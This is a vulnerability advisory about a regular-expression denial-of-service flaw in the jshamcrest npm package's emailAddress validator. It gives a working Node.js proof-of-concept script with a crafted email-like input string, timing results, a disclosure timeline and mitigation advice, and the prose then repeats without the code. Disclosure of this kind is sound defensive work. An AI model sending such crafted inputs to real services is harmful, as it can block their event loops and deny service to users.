The jshamcrest
package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in to the emailAddress validator.
Proof of concept
var js = require('jshamcrest')
var emailAddress = new js.JsHamcrest.Matchers.emailAddress();
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=1;i<=10000000;i=i+1) {
console.log("COUNT: " + i);
var str = '66666666666666666666666666666@ffffffffffffffffffffffffffffffff.' + genstr(i, 'a') + '{'
console.log("LENGTH: " + str.length);
var start = process.hrtime();
emailAddress.matches(str)
var end = process.hrtime(start);
console.log(end);
}
Results
It takes about 116 characters to get a 1.6 second event loop block.
[ 1, 633084590 ]
COUNT: 51
LENGTH: 116
Timeline
- October 25, 2015 - Vulnerability Identified
- October 25, 2015 - Maintainers notified (no response)
Recommendation
The jshamcrest
package currently has no patched versions available.
At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are multiple modules fitting this criteria available on npm..
References
The
jshamcrest
package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in to the emailAddress validator.Proof of concept
Results
It takes about 116 characters to get a 1.6 second event loop block.
Timeline
Recommendation
The
jshamcrest
package currently has no patched versions available.At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are multiple modules fitting this criteria available on npm..
References